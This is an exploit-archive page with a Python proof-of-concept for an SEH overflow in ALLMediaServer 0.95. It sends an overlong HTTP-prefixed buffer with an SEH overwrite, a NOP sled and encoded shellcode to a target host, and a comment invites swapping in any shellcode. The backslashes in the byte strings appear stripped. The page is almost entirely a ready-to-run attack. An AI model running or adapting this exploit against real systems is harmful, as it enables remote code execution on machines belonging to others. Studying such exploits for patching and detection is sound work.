ALLMediaServer 0.95 SEH Overflow Exploit

Posted on 22 August 2013
<pre>#!/usr/bin/python
print
&quot;&quot;&quot;
[+] Exploit Title: ALLMediaServer 0.95 SEH Overflow Exploit
[+] Date: 21/08/2013
[+] Exploit Author: metacom
[+] Romanian Security Team
[+] Software Link:http://allmediaserver.org/download
[+] Version: ALLMediaServer 0.95
[+] Tested On: Windows XP SP3 English
[+] ALLMediaServer run online mod and try two or three times to run exploit
&quot;&quot;&quot;
import time
import socket
import sys

if len(sys.argv) != 3:
    print &quot;Usage: ./exploit.py &lt;Target IP&gt; &lt;Target Port&gt;&quot;
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

buffer = &quot;http://&quot; + &quot;x41&quot; * 1065

nseh = &quot;xEBx06xFFxFF&quot; 

seh = &quot;x54x08x6fx00&quot; #0x0042173c # 0x006f0854

nops = &quot;x90&quot; * 50
#msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00' -e x86/shikata_ga_nai -t c
# you can replace the shellcode with any shellcode u want
shell = (&quot;xb8x66xa5xa3x41xdbxd5xd9x74x24xf4x5bx33xc9xb1&quot;
&quot;x33x31x43x12x83xc3x04x03x25xabx41xb4x55x5bx0c&quot;
&quot;x37xa5x9cx6fxb1x40xadxbdxa5x01x9cx71xadx47x2d&quot;
&quot;xf9xe3x73xa6x8fx2bx74x0fx25x0axbbx90x8bx92x17&quot;
&quot;x52x8dx6ex65x87x6dx4exa6xdax6cx97xdax15x3cx40&quot;
&quot;x91x84xd1xe5xe7x14xd3x29x6cx24xabx4cxb2xd1x01&quot;
&quot;x4exe2x4ax1dx18x1axe0x79xb9x1bx25x9ax85x52x42&quot;
&quot;x69x7dx65x82xa3x7ex54xeax68x41x59xe7x71x85x5d&quot;
&quot;x18x04xfdx9exa5x1fxc6xddx71x95xdbx45xf1x0dx38&quot;
&quot;x74xd6xc8xcbx7ax93x9fx94x9ex22x73xafx9axafx72&quot;
&quot;x60x2bxebx50xa4x70xafxf9xfdxdcx1ex05x1dxb8xff&quot;
&quot;xa3x55x2axebxd2x37x20xeax57x42x0dxecx67x4dx3d&quot;
&quot;x85x56xc6xd2xd2x66x0dx97x2dx2dx0cxb1xa5xe8xc4&quot;
&quot;x80xabx0ax33xc6xd5x88xb6xb6x21x90xb2xb3x6ex16&quot;
&quot;x2exc9xffxf3x50x7exffxd1x32xe1x93xbax9ax84x13&quot;
&quot;x58xe3&quot;)


payload = buffer + nseh + seh + nops + shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print &quot;[+] Connected&quot;
except:
    print &quot;[!] Connection Failed&quot;
    sys.exit(0)

print &quot;[+] Sending payload...&quot;
s.send(payload)
time.sleep(1)
s.close()

print &quot;[+] Check port 888 for your shell&quot;

</pre>
TOP
Malware :

Last 20
Exploits :

Last 20